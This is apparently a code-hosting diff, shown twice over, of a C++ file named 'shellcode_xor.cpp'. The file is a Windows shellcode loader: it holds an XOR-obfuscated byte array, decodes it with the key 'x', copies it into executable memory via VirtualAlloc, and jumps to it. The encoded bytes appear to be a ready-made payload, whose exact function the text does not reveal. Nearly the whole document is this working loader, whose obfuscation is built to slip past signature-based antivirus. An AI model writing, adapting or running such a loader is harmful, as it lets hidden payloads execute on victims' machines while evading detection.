FernandoDoming · September 10, 2016 16:57
diff --git a/shellcode_xor.cpp b/shellcode_xor.cpp
 #include <windows.h>
 #include <iostream>

 void decrypt(char * b, char * c, int n) {
 	for (int i = 0; i < n; i++) {
 		c[i] = b[i] ^ 'x';
 	}
 }

 void exec(char * d, int n) {
 	void *exec = VirtualAlloc(0, n, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 	if (exec != NULL) {
 		memcpy(exec, d, n);
 		((void(*)())exec)();
 	}
 }

 int main(int argc, char **argv) {
 	char b[] = { 0x84, 0x90, 0xfa, 0x78, 0x78, 0x78, 0x18, 0xf1, 0x9d, 0x49, 0xb8, 0x1c, 0xf3, 0x28, 0x48,
 		0xf3, 0x2a, 0x74, 0xf3, 0x2a, 0x6c, 0xf3, 0x0a, 0x50, 0x77, 0xcf, 0x32, 0x5e, 0x49, 0x87,
 		0xd4, 0x44, 0x19, 0x04, 0x7a, 0x54, 0x58, 0xb9, 0xb7, 0x75, 0x79, 0xbf, 0x9a, 0x8a, 0x2a,
 		0x2f, 0xf3, 0x2a, 0x68, 0xf3, 0x32, 0x44, 0xf3, 0x34, 0x69, 0x00, 0x9b, 0x30, 0x79, 0xa9,
 		0x29, 0xf3, 0x21, 0x58, 0x79, 0xab, 0xf3, 0x31, 0x60, 0x9b, 0x42, 0x31, 0xf3, 0x4c, 0xf3,
 		0x79, 0xae, 0x49, 0x87, 0xd4, 0xb9, 0xb7, 0x75, 0x79, 0xbf, 0x40, 0x98, 0x0d, 0x8e, 0x7b,
 		0x05, 0x80, 0x43, 0x05, 0x5c, 0x0d, 0x9c, 0x20, 0xf3, 0x20, 0x5c, 0x79, 0xab, 0x1e, 0xf3,
 		0x74, 0x33, 0xf3, 0x20, 0x64, 0x79, 0xab, 0xf3, 0x7c, 0xf3, 0x79, 0xa8, 0xf1, 0x3c, 0x5c,
 		0x5c, 0x23, 0x23, 0x19, 0x21, 0x22, 0x29, 0x87, 0x98, 0x27, 0x27, 0x22, 0xf3, 0x6a, 0x93,
 		0xf5, 0x25, 0x10, 0x4b, 0x4a, 0x78, 0x78, 0x10, 0x0f, 0x0b, 0x4a, 0x27, 0x2c, 0x10, 0x34,
 		0x0f, 0x5e, 0x7f, 0x87, 0xad, 0xc0, 0xe8, 0x79, 0x78, 0x78, 0x51, 0xbc, 0x2c, 0x28, 0x10,
 		0x51, 0xf8, 0x13, 0x78, 0x87, 0xad, 0x12, 0x7d, 0x10, 0xb8, 0xd0, 0x79, 0xa1, 0x10, 0x7a,
 		0x78, 0x69, 0x24, 0xf1, 0x9e, 0x28, 0x28, 0x28, 0x28, 0x38, 0x28, 0x38, 0x28, 0x10, 0x92,
 		0x77, 0xa7, 0x98, 0x87, 0xad, 0xef, 0x12, 0x68, 0x2e, 0x2f, 0x10, 0xe1, 0xdd, 0x0c, 0x19,
 		0x87, 0xad, 0xfd, 0xb8, 0x0c, 0x72, 0x87, 0x36, 0x70, 0x0d, 0x94, 0x90, 0x19, 0x78, 0x78,
 		0x78, 0x12, 0x78, 0x12, 0x7c, 0x2e, 0x2f, 0x10, 0x7a, 0xa1, 0xb0, 0x27, 0x87, 0xad, 0xfb,
 		0x80, 0x78, 0x06, 0x4e, 0xf3, 0x4e, 0x12, 0x38, 0x10, 0x78, 0x68, 0x78, 0x78, 0x2e, 0x12,
 		0x78, 0x10, 0x20, 0xdc, 0x2b, 0x9d, 0x87, 0xad, 0xeb, 0x2b, 0x12, 0x78, 0x2e, 0x2b, 0x2f,
 		0x10, 0x7a, 0xa1, 0xb0, 0x27, 0x87, 0xad, 0xfb, 0x80, 0x78, 0x05, 0x5a, 0x20, 0x10, 0x78,
 		0x38, 0x78, 0x78, 0x12, 0x78, 0x28, 0x10, 0x73, 0x57, 0x77, 0x48, 0x87, 0xad, 0x2f, 0x10,
 		0x0d, 0x16, 0x35, 0x19, 0x87, 0xad, 0x26, 0x26, 0x87, 0x74, 0x5c, 0x91, 0x09, 0x87, 0x87,
 		0x87, 0x79, 0xbb, 0x51, 0xbe, 0x0d, 0xbf, 0xbb, 0xc3, 0x88, 0xcd, 0xda, 0x2e, 0x12, 0x78,
 		0x2b, 0x87, 0xad };
 	char c[sizeof b] = { 0 };
 	decrypt(b, c, sizeof b);
 	exec(c, sizeof c);

 	return 0;
 }
	#include <windows.h>
	#include <iostream>

	void decrypt(char * b, char * c, int n) {
	for (int i = 0; i < n; i++) {
	c[i] = b[i] ^ 'x';
	}
	}

	void exec(char * d, int n) {
	void *exec = VirtualAlloc(0, n, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (exec != NULL) {
	memcpy(exec, d, n);
	((void(*)())exec)();
	}
	}

	int main(int argc, char **argv) {
	char b[] = { 0x84, 0x90, 0xfa, 0x78, 0x78, 0x78, 0x18, 0xf1, 0x9d, 0x49, 0xb8, 0x1c, 0xf3, 0x28, 0x48,
	0xf3, 0x2a, 0x74, 0xf3, 0x2a, 0x6c, 0xf3, 0x0a, 0x50, 0x77, 0xcf, 0x32, 0x5e, 0x49, 0x87,
	0xd4, 0x44, 0x19, 0x04, 0x7a, 0x54, 0x58, 0xb9, 0xb7, 0x75, 0x79, 0xbf, 0x9a, 0x8a, 0x2a,
	0x2f, 0xf3, 0x2a, 0x68, 0xf3, 0x32, 0x44, 0xf3, 0x34, 0x69, 0x00, 0x9b, 0x30, 0x79, 0xa9,
	0x29, 0xf3, 0x21, 0x58, 0x79, 0xab, 0xf3, 0x31, 0x60, 0x9b, 0x42, 0x31, 0xf3, 0x4c, 0xf3,
	0x79, 0xae, 0x49, 0x87, 0xd4, 0xb9, 0xb7, 0x75, 0x79, 0xbf, 0x40, 0x98, 0x0d, 0x8e, 0x7b,
	0x05, 0x80, 0x43, 0x05, 0x5c, 0x0d, 0x9c, 0x20, 0xf3, 0x20, 0x5c, 0x79, 0xab, 0x1e, 0xf3,
	0x74, 0x33, 0xf3, 0x20, 0x64, 0x79, 0xab, 0xf3, 0x7c, 0xf3, 0x79, 0xa8, 0xf1, 0x3c, 0x5c,
	0x5c, 0x23, 0x23, 0x19, 0x21, 0x22, 0x29, 0x87, 0x98, 0x27, 0x27, 0x22, 0xf3, 0x6a, 0x93,
	0xf5, 0x25, 0x10, 0x4b, 0x4a, 0x78, 0x78, 0x10, 0x0f, 0x0b, 0x4a, 0x27, 0x2c, 0x10, 0x34,
	0x0f, 0x5e, 0x7f, 0x87, 0xad, 0xc0, 0xe8, 0x79, 0x78, 0x78, 0x51, 0xbc, 0x2c, 0x28, 0x10,
	0x51, 0xf8, 0x13, 0x78, 0x87, 0xad, 0x12, 0x7d, 0x10, 0xb8, 0xd0, 0x79, 0xa1, 0x10, 0x7a,
	0x78, 0x69, 0x24, 0xf1, 0x9e, 0x28, 0x28, 0x28, 0x28, 0x38, 0x28, 0x38, 0x28, 0x10, 0x92,
	0x77, 0xa7, 0x98, 0x87, 0xad, 0xef, 0x12, 0x68, 0x2e, 0x2f, 0x10, 0xe1, 0xdd, 0x0c, 0x19,
	0x87, 0xad, 0xfd, 0xb8, 0x0c, 0x72, 0x87, 0x36, 0x70, 0x0d, 0x94, 0x90, 0x19, 0x78, 0x78,
	0x78, 0x12, 0x78, 0x12, 0x7c, 0x2e, 0x2f, 0x10, 0x7a, 0xa1, 0xb0, 0x27, 0x87, 0xad, 0xfb,
	0x80, 0x78, 0x06, 0x4e, 0xf3, 0x4e, 0x12, 0x38, 0x10, 0x78, 0x68, 0x78, 0x78, 0x2e, 0x12,
	0x78, 0x10, 0x20, 0xdc, 0x2b, 0x9d, 0x87, 0xad, 0xeb, 0x2b, 0x12, 0x78, 0x2e, 0x2b, 0x2f,
	0x10, 0x7a, 0xa1, 0xb0, 0x27, 0x87, 0xad, 0xfb, 0x80, 0x78, 0x05, 0x5a, 0x20, 0x10, 0x78,
	0x38, 0x78, 0x78, 0x12, 0x78, 0x28, 0x10, 0x73, 0x57, 0x77, 0x48, 0x87, 0xad, 0x2f, 0x10,
	0x0d, 0x16, 0x35, 0x19, 0x87, 0xad, 0x26, 0x26, 0x87, 0x74, 0x5c, 0x91, 0x09, 0x87, 0x87,
	0x87, 0x79, 0xbb, 0x51, 0xbe, 0x0d, 0xbf, 0xbb, 0xc3, 0x88, 0xcd, 0xda, 0x2e, 0x12, 0x78,
	0x2b, 0x87, 0xad };
	char c[sizeof b] = { 0 };
	decrypt(b, c, sizeof b);
	exec(c, sizeof c);

	return 0;
	}